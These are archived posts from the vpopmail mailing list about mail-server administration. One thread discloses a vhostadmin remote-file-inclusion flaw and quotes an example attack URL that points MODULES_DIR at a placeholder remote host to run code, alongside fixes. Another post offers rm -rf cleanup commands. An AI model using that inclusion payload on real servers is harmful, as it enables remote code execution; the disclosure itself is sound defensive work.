Re: [vchkpw] Off Topic: Virtual FTP Server or web-based file manager?
On Aug 14, 2007, at 11:08 PM, Tom Collins wrote: OK, so it's off-topic, but can anyone recommend an FTP server or web-based file manager that I can deploy on my hosting server that either integrates with vpopmail (like maybe Pure-FTPd) and has a nice interface for managing accounts? I only have two IPs for my server, so multiple clients would share the same FTP server. I'm considering having usernames that include domain names for logging in, and thought that QmailAdmin might be a good interface for managing the FTP accounts. Web may be a better way to go, because FTP is already in use by clients for managing their web content. If I use Pure-FTPd or vsftpd, it will need to be configured for both system users and virtual users. A well-designed, web-based file manager would be a great replacement for FTP. A search on SourceForge didn't turn up many promising leads. Lots of stuff that hasn't been maintained since 2004, or has less than 1000 downloads. Any recommendations? -- Tom Collins - [EMAIL PROTECTED] Vpopmail - virtual domains for qmail: http://vpopmail.sf.net/ QmailAdmin - web interface for Vpopmail: http://qmailadmin.sf.net/ For Pure-FTPD you can write your own authentication "plugin" and use it, so you could write it to auth against vpopmail. http://linux.die.net/man/8/pure-authd Bert JW Regeer smime.p7s Description: S/MIME cryptographic signature
Re: [vchkpw] Compiling vpopmail on Opensolaris
On Jul 22, 2007, at 11:17 AM, Patrick Ale wrote: Hi all, Today I tried to compile vpopmail on a x86 box running Opensolaris. During the compilation I got the following error: # make make all-recursive Making all in cdb gcc -L/usr/sfw/lib/openssl -Wall -I/usr/sfw/include/openssl -o vchkpw vchkpw.o md5.o hmac_md5.o libvpopmail.a -lcrypt Undefined first referenced symbol in file warnlibvpopmail.a(libvpopmail_a- vpopmail.o) ld: fatal: Symbol referencing errors. No output written to vchkpw collect2: ld returned 1 exit status What symbol is it complaining about? Undefined is kind of useless. Do you guys have any idea what can be going on? Help me set up a OpenSolaris machine with just a console and compiler and I will try to duplicate the problem and see if I can fix it. Cheers, Patrick Bert JW Regeer smime.p7s Description: S/MIME cryptographic signature
Re: [vchkpw] R: Re: [vchkpw] adduser processing times CDB
Your rm fu is not strong enough: rm -rf -- * or: find . -print0 | xargs -0 rm -rf H. Shell scripting. Bert JW Regeer On Jul 22, 2007, at 4:31 PM, Quey wrote: Hi, A good option, I have been using it for a while. BTW, this ones for the coders... upon deleting my test domain with 90K odd accounts vdeldomain had problems.. it removed from the database, but did not remove much of the directories, got some, but left problematic filenames (those starting with ?, ie: ?new ?cur ) etc, thereby a rm -rf wouldnt work, i had to unmount the disk and run e2fsck and took 25 mins holding down "y" to correct the issues before I could rm - rf the vast majority of that 90K, so perhaps the removal of physical directories process needs to be revisited? Otherwise, I agree if you have more than a few thousand users in a domain, dump cdb and use mysql, the performace is greatly noticed :) smime.p7s Description: S/MIME cryptographic signature
Re: [vchkpw] Rules on linking against the vpopmail libraries
On Jun 24, 2007, at 7:44 PM, Tom Collins wrote: On Jun 24, 2007, at 2:35 PM, Rick Widmer wrote: Selling a commercial product that includes vpopmail code is exactly what the GPL license is designed to prevent. Why should you get to sell our labor without paying us? What if QmailAdmin had been written as a proprietary, commercial app? Would the GPL have prevented someone from doing that? IANAL, but I don't think that linking libvpopmail and using it's API would necessarily force a program to be GPL. -- Tom Collins - [EMAIL PROTECTED] Vpopmail - virtual domains for qmail: http://vpopmail.sf.net/ QmailAdmin - web interface for Vpopmail: http://qmailadmin.sf.net/ Yeah, that what I really need answered is the question that Tom Collins asks, what if QmailAdmin had been proprietary. Rick: I am not planning on using any vpopmail code, just linking against the library and using it's API. I have looked at vpopmaild, and have not found it satisfactory to what I would like it to do. thank you for your answers, if anyone else wants to comment on the thread, please do not hesitate to do so. Further down the line of this project I will hire a lawyer to assess what we need to do. Most likely it will result into us considering a different system, or a home grown one. As of right now we are testing different implementations and deciding on the best one to choose for the project we are working with. Bert JW Regeer smime.p7s Description: S/MIME cryptographic signature
[vchkpw] Rules on linking against the vpopmail libraries
Hi, I am a small software engineer who is currently doing contract work for a company, and I have a question about what license the vpopmail library is under (vpopmail.a and friends). I am developing commercial software for them that would link against the library, and now I have read that doing so could cause my binary to fall under the GPL, and thus it's source code as well, are these claims warranted? If so, would it be possible to get the vpopmail lib's under something less constrictive, for example the LGPL? I know you guys are not lawyers and I should instead contact them, but I figured it would be easier to ask here first before going for professional advice, where I would have to spend hundreds of dollars an hour. Now, would it be okay if I wrote a wrapper, which if needed could be released under the GPL, that then talked to the real binary through other means (pipes, most probably)? Thank you, Bert JW Regeer smime.p7s Description: S/MIME cryptographic signature
Re: [vchkpw] XSS Bug in vhostadmin
On Jan 29, 2007, at 21:52 , Shane Chrisp wrote:
I know this is not exactly vpopmail related, but as its a vpopmail
related tool i thought others here would like to be made aware of
this.
I have been using vhostadmin for a while now, and have just noticed
that
it is vulnerable to a xss attack which could lead to the underlying
system being cracked. The problem is the $MODULES_DIR var is not being
protected against injection of a remote path and simply accepts
whatever
is passed to it such as
http://server/path/to/vhostadmin/modules/main.php?
MODULES_DIR=http://remoteserver/path/to/bad/file.php?&cmd=0wn3d
A quick fix is to change global.inc and change
$MODULES_DIR = 'modules';
to
define("MODULES_DIR", "modules");
and then change all references in any file it appears in of
$MODULES_DIR
to
MODULES_DIR
and comment out any references to
global $MODULES_DIR;
to
//global $MODULES_DIR;
There may be other issues, but this one I came accross yesterday
when I
noticed the above formated url in the apacge logs. Also, we have
modified some of the system ourselves, so it is entirely possible that
we may be partly to blame for some or all of this, but it would
certainly be worth watching out for if you are using the system.
Regards
Shane
Or turn off Register_global, and then MODULES_DIR would only exist in
$_GET[]. I chalk this one up to a bad PHP configuration:
http://www.php.net/register_globals
While it would not stop attacks that could cause you to include stuff
if other variables are not checked before blindly being used from the
$_POST and $_GET arrays, however the attack you just mentioned is
null and void.
If you are running with register_globals on, you should seriously re-
consider. It will be deprecated, and I can't wait for it to finally
be gone, then script writers will have to learn how to use the
array's that were meant for that sort of data.
Bert JW Regeer
smime.p7s
Description: S/MIME cryptographic signature
Re: [vchkpw] authdaemond: vmysql: sql error[3]: Table 'vpopmail.testi_com' doesn't exist
On Oct 18, 2006, at 03:24:42 MST, Jarkko Ranta wrote: Bert JW Regeer kirjoitti: On Oct 18, 2006, at 02:45:12 MST, Jarkko Ranta wrote: Hello, I'm in need of a bit of advice: I first installed vpopmail-5.4.13 with the many domains option (own table for each virtual domain). Now, when I installed vpopmail-5.4.17 so that each domain goes to the table vpopmail.vpopmail, thinks get wrong. (I even removed whole /home/ vpopmail/ and the database and did the install from the begining) When I do vadddomain and vadduser, the users go neatly to vpopmail.vpopmail (and the Maildir-directory sturcture is nicely created), but when I try to authenticate via IMAP (Courier) it failes an /var/log/maillog tells me this: Oct 18 12:14:20 moya authdaemond: vmysql: sql error[3]: Table 'vpopmail.testi_com' doesn't exist Oct 18 12:14:20 moya authdaemond: Attempting to rebuild connection to SQL server Oct 18 12:14:20 moya authdaemond: vmysql: connection rebuild failed: Table 'vpopmail.testi_com' doesn't exist Oct 18 12:14:20 moya imapd: LOGIN FAILED, [EMAIL PROTECTED], ip=[:::62.142.95.226] Where can I tell vpopmail that it should try table vpopmail.vpopmail and not vpopmail.DOMAIN? I configured vpopmail-5.4.17 with this: ./configure --disable-ip-alias-domains --enable-auth-module=mysql --enable-clear-passwd --enable-libdir=/usr/lib64/mysql/ --enable- tcpserver-path=/home/vpopmail/etc/ --enable-tcpserver-file=/home/ vpopmail/etc/tcp.smtp --enable-qmail-ext --enable-logging=e -- enable-tcprules-prog=/usr/local/bin/tcprules --enable-rebuild- tcpserver-file --disable-domain-quotas --enable-many-domains=y -- enable-auth-logging --enable-sql-logging --enable-valias -- disable-mysql-limits --disable-roaming-users --enable-logging=p -- disable-passwd Best Regards, Jarkko Ranta You need to recompile vmysql or whatever authdaemond is using. It is out of date. Bert JW Regeer Shouldn't it get recompiled from vpopmail-5.4.17/vmysql.c vpopmail-5.4.17/vmysql.h when I do "make" (and "make install-strip") after the vpopmail's configurartion script? Or have I missed a switch or something? It's Inter7's own files, so they should be the most recent? Best Regards, Jarkko Ranta authdaemond is failing, recompile that. Bert JW Regeer smime.p7s Description: S/MIME cryptographic signature
Re: [vchkpw] authdaemond: vmysql: sql error[3]: Table 'vpopmail.testi_com' doesn't exist
On Oct 18, 2006, at 02:45:12 MST, Jarkko Ranta wrote: Hello, I'm in need of a bit of advice: I first installed vpopmail-5.4.13 with the many domains option (own table for each virtual domain). Now, when I installed vpopmail-5.4.17 so that each domain goes to the table vpopmail.vpopmail, thinks get wrong. (I even removed whole /home/ vpopmail/ and the database and did the install from the begining) When I do vadddomain and vadduser, the users go neatly to vpopmail.vpopmail (and the Maildir-directory sturcture is nicely created), but when I try to authenticate via IMAP (Courier) it failes an /var/log/maillog tells me this: Oct 18 12:14:20 moya authdaemond: vmysql: sql error[3]: Table 'vpopmail.testi_com' doesn't exist Oct 18 12:14:20 moya authdaemond: Attempting to rebuild connection to SQL server Oct 18 12:14:20 moya authdaemond: vmysql: connection rebuild failed: Table 'vpopmail.testi_com' doesn't exist Oct 18 12:14:20 moya imapd: LOGIN FAILED, [EMAIL PROTECTED], ip=[:::62.142.95.226] Where can I tell vpopmail that it should try table vpopmail.vpopmail and not vpopmail.DOMAIN? I configured vpopmail-5.4.17 with this: ./configure --disable-ip-alias-domains --enable-auth-module=mysql -- enable-clear-passwd --enable-libdir=/usr/lib64/mysql/ --enable- tcpserver-path=/home/vpopmail/etc/ --enable-tcpserver-file=/home/ vpopmail/etc/tcp.smtp --enable-qmail-ext --enable-logging=e -- enable-tcprules-prog=/usr/local/bin/tcprules --enable-rebuild- tcpserver-file --disable-domain-quotas --enable-many-domains=y -- enable-auth-logging --enable-sql-logging --enable-valias --disable- mysql-limits --disable-roaming-users --enable-logging=p --disable- passwd Best Regards, Jarkko Ranta You need to recompile vmysql or whatever authdaemond is using. It is out of date. Bert JW Regeer smime.p7s Description: S/MIME cryptographic signature
Re: [vchkpw] Why is vadduser creating a hierarchy?
On Oct 14, 2006, at 16:06:30 MST, Rainer Duffner wrote: Bert JW Regeer wrote: Hey Ismail, I would like to see some stats on this. Do you have any facts or evidence to back this up? It's true - if you don't have some sort of directory-hashing (UFS_DIRHASH in FreeBSD-land) in place, which for FreeBSD has been default since sometime in the early 4.x days, IIRC. We are talking about new systems that exist right now. There is no need to do dirhashing in an application anymore. On current systems 7000 directories inside a directory should not be a problem. Most employ hashing of some sort to speed up this kind of thing. On my FreeBSD system there is currently a directory with 10,010 directories, and it is no slower than if that same directory had only 128 directories in it for example. Several of my users are on several mailing lists for open source projects, and some of their Maildir's have cur directories with over 30,000 emails in them. Biggest one is 150,000, with no slow downs. No extra load on my server. DJB gave qmail's queue split directories, See above. DJB was or is a (Free)-BSD user (when he started, Linux was a toy anyway), which back in these days had this problem. Agreed, however his Maildir approach did not include hashing in any way shape or form, so how did file systems back then handle over 1000's of email messages in an Inbox? why I do not understand, and I might never, since clearly he did not create his Maildir's to have the same sort of split directories for speedy access by IMAP/POP3 or other mail protocols. I always disable vpopmail's big dir stuff, as writing scripts for it is harder, extra sub directories to traverse. Just use the output of vuserinfo -d Not always what I need. BTW: Does the latest version of vpopmail include the patch someone posted that fills up earlier hash-directories, where domains have been deleted from, instead of creating new ones? cheers, Rainer Greets, Bert JW Regeer smime.p7s Description: S/MIME cryptographic signature
Re: Re[2]: [vchkpw] Why is vadduser creating a hierarchy?
Hey Ismail, I would like to see some stats on this. Do you have any facts or evidence to back this up? On current systems 7000 directories inside a directory should not be a problem. Most employ hashing of some sort to speed up this kind of thing. On my FreeBSD system there is currently a directory with 10,010 directories, and it is no slower than if that same directory had only 128 directories in it for example. Several of my users are on several mailing lists for open source projects, and some of their Maildir's have cur directories with over 30,000 emails in them. Biggest one is 150,000, with no slow downs. No extra load on my server. DJB gave qmail's queue split directories, why I do not understand, and I might never, since clearly he did not create his Maildir's to have the same sort of split directories for speedy access by IMAP/POP3 or other mail protocols. I always disable vpopmail's big dir stuff, as writing scripts for it is harder, extra sub directories to traverse. Bert JW Regeer On Oct 7, 2006, at 19:53:36 MST, Ismail YENIGUL wrote: Dave, Please note that creating 7000 sub directories in a single directory will effect your performance negatively. Friday, October 6, 2006, 11:50:26 PM, you wrote: Rick Macdougall wrote: Dave Richardson wrote: I'm using a script to add thousands of user accounts as part of a migration for a single domain. It's a perl script making repeated calls to /home/vpopmail/bin/vadduser -e "dsfgskjghaekjrgkr" [EMAIL PROTECTED] The scripting is working fine, I see the accounts correctly in MySQL's vpopmail table. However, I'm seeing vadduser create a hierarchy of folders after about the first 80-100 users are added. Using subfolders A-z,0-9. I only have about 7,000 users to manage and would rather NOT subtree (whatever the term is) this user hierarchy. What logic controls when vadduser decides to subtree the folders for a particular domain? Or, should I just let my script run out all the migrations, create the user/Maildirs wherever, and then start moving them to the root of the domain folder? That leaves some nasty work in SQL to clean up the home folder field! Hi, Configure vpopmail with --disable-users-big-dir. --disable-users-big-dirDisable hashing of user directories. Regards, Rick Thanks Rick and Jon! -- Ismail YENIGUL Proje Yöneticisi / Project Manager [EMAIL PROTECTED] http://www.endersys.com smime.p7s Description: S/MIME cryptographic signature
Re: [vchkpw] Re: List to send email for everybody for domain.
On Sep 22, 2006, at 04:08:42 MST, Robin Bowes wrote: Krzysiek Włodarczak wrote: Juliano Souza - Tecnologia napisał(a): How I can build an list [EMAIL PROTECTED] to send emails for everyone for domain? Try ezalm: http://www.ezmlm.org/ I've had the same issue. A client (ISP) wants to send mail to all users in all domains hosted on a particular server. Creating an ezmlm list for all users would be feasible, but would be impossible to maintain as users are added/removed. vpopbull will apparently do this (if you leave off the domain parameter it apparently sends to all domains) *but* it doesn't recognise any forwarding settings, i.e. it just drops the mail in the Maildir on the filesystem without checking .qmail files. Would it be possible to modify vpopbull so it uses std qmail delivery? Thanks, R. !DSPAM:4513c4ae289661973912509! But vpopbull will spit out an entire list of users on the system, you can then lazy add them to an ezmlm list every so often (run it through cron) and then you'd be set. This solution was suggested on this mailing list before. Bert JW Regeer smime.p7s Description: S/MIME cryptographic signature !DSPAM:4513df1623461090830083!
Re: [vchkpw] vpopbul - excluding domains
On Sep 12, 2006, at 11:09:31 MST, Jeff Koch wrote: Two questions on this program: 1. Can domains be excluded from receiving the bulletin instead of having to list every email address? I don't know, what does the manual say? What does it return when you type vpopbull without any commands? 2. Does the mailing go to forwards as well as pop accounts? No, it will not go to forwards. vpopbull places the email as a real text file in the users Maildir and it does not inject it into the mail system to deliver it like the standard mail system. As for POP accounts, I assume you have qmail-pop3d running as your pop3 server, in which case it will show up like every other message the user downloads from their account, which in turn comes from the Maildir. If you need forward support, best bet is to create an ezmlm mailling list, and update it each time, for this method there have been emails in the last month regarding how to do that. Thanks Best Regards, Jeff Koch Greets, Bert JW Regeer smime.p7s Description: S/MIME cryptographic signature
Re: [vchkpw] Re: Stupid roaming-users question
On Aug 28, 2006, at 11:56:03 MST, [EMAIL PROTECTED] wrote: On Tue, 29 Aug 2006, Alex Borges wrote: I hope its the question thats stupid. We regretfully have no human-rights compatible fix for stupid users. Sorry for the unwanted noise...in my rush to install a bazillion different packages, it didn't occur to me that FreeBSD ports would default to what looks like a non-standard location for the cdb file. James Smallacombe PlantageNet, Inc. CEO and Janitor [EMAIL PROTECTED] http://3.am == === man hier It is not non-standard for FreeBSD packages. vpopmail get's installed to /usr/local/vpopmail. This is in accordance with man hier. All FreeBSD packages install into /usr/local. /home, or rather /usr/home (/home is a symlink) is where user created files should live, not system libraries and binaries. From man hier: /usr local/local executables, libraries, etc. Also used as the default destination for the FreeBSD ports framework. Within local/, the general layout sketched out by hier for /usr should be used. Exceptions are the man directory (directly under local/ rather than under local/share/), ports documentation (in share/doc//), and /usr/local/etc (mimics /etc). NOTES This manual page documents the default FreeBSD file system layout, but the actual hierarchy on a given system is defined at the system adminis- trator's discretion. A well-maintained installation will include a cus- tomized version of this document. Bert JW Regeer smime.p7s Description: S/MIME cryptographic signature
Re: [vchkpw] vpopmail-to-vpopmail migration plan and questions
The way I personally do it, is move all the contents over, and after that is all done, shut down the old qmail, set up a tcpserver with a simple netcat to port 25 on the new server, and it is like a proxy. All mail that would still be going to the old server because of old dnscaches now does not even hit the old servers disk, and it all becomes network bound. The reason I did it this way was the fact that the machine was running with no hard drives in it from a USB stick as a last resort to get data of the dying hard drives. For the rest I used rsync to move all the structures over, including the control and qmail config files. Bert JW Regeer On Aug 14, 2006, at 05:06:26 EDT, Kurt Bigler wrote: My uplevel talked me into using an even simpler approach (more like yours), making my original question partly moot. The two servers (freebsd jail vps's actually) are binary-compatible so we just rsync'd the entire server (vps). We will do a final rsync for the real transition after doing some testing first. However your step 5 concerns me. I'm assuming in the scenario I just described that your step 5 isn't necessary, and please correct me if I'm wrong. The uid/gid's should be identical, and I confirmed that vpopmail gets 89:89 on both servers. Qmailadmin seems to think the domains and users were transferred ok. Pop and smtp access seems to work. My originally described approach was intended to be more "conservative" and even permit me to migrate one domain at a time in a leisurely and careful way, and would avoid shutting down qmail until the entire transition is complete. From a message on the toaster list I gleaned that I would need to hand-empty the virtualdomains file on the old server to implement my original step 5. Thanks for your detailed info, which confirmed my uplevel's suggested strategy, and which I'll file for future use, and is a good piece for the archives. -Kurt on 8/13/06 9:31 PM, Austin Jorden <[EMAIL PROTECTED]> wrote: I've worked with your exact setup before nearly. The best thing you can do is.. 1) Do nothing on your old vpopmail machine yet. 2) Install vpopmail on your new machine 3) DO-NOT create your domains or anything on your new machine yet. 4) Use Rsync through SSH to copy your vpopmail directory from your old server to your new one. I know the exact command if you want it. should be /home/vpopmail 5) Create your domains on your new machine, you'll get a warning "Domain already exists" however it will create anyways and all of your users will be automatically created, and your domains will get the correct UID and GID's. 6) When you're sure it'll work for you (which I'm 99.9% positive it will), simply use rsync to recopy your old vpopmail directory to your new one on the new server. RSync will only copy the new files, so it doesn't recopy anything, therefore you don't have any missed e-mails. 7) Repoint your DNS and you have a complete transfer. on your old machine, do this.. rsync -av -e ssh /home/vpopmail 0.0.0.0:/home Replace the 0's with the destination IP address, it'll prompt you for the new servers root password, enter it in and it'll build file list and transfer everything over. You may get some warnings and/or errors from rsync saying "Some files could not be transfered" that's because some files your trying to transfer are currently being used, etc. To stop that, simply cutoff the connections and then transfer (possible right before you transfer everything to make the new server active) If you have any questions, let me know. - Austin Jorden On Sun, August 13, 2006 8:35 pm, Kurt Bigler wrote: I'm migrating my vpopmail server to a new machine. The DNS zones fortunately do not have to be moved. My tentative plan for how to achieve the transition is as follows. (1) set up the new server with identical vpopmail domain/user structure (2) have the new server ready to receive SMTP for these domains, but with no MX pointing to it yet (3) set up the old server to route ALL outgoing SMTP through the new server At that point everything is basically set up for a transition, but nothing has really changed yet except how outgoing SMTP is being routed. (4) On the old server, delete all domains currently delivered locally there, but still accept incoming messages for those domains. (Also retain maildirs and contents for later copying. So I can't just vdeldomain.) The idea is that incoming messages still go through the old server, but as soon as the local domains are gone they get passed on to the new server with all other outgoing SMTP. (5) Copy all residual POP directory contents left on the old server to the new server. (6) Re-point the MX to the new server. Actually this is probably just an
Re: [vchkpw] Stability of error codes from vchkpw
On Aug 5, 2006, at 09:44:44 GMT+02:00, Charles Butcher wrote: I am writing an SMTP authentication plugin for qpsmtpd which will call vchkpw. Different error codes require different treatment; e.g. "incorrect password" is fatal, whereas some errors should probably allow a retry before dropping the connection. So can the various error code values from vchkpw be relied upon, or are they subject to change? Are they officially published somewhere in the doco/specs or is the source code the only authoritative reference? They have to adhere to the standard set by the checkpassword implementation from DJB. http://cr.yp.to/checkpwd/interface.html is the interface, it's exit codes and how to react upon those exit codes. Good luck, Bert JW Regeer smime.p7s Description: S/MIME cryptographic signature
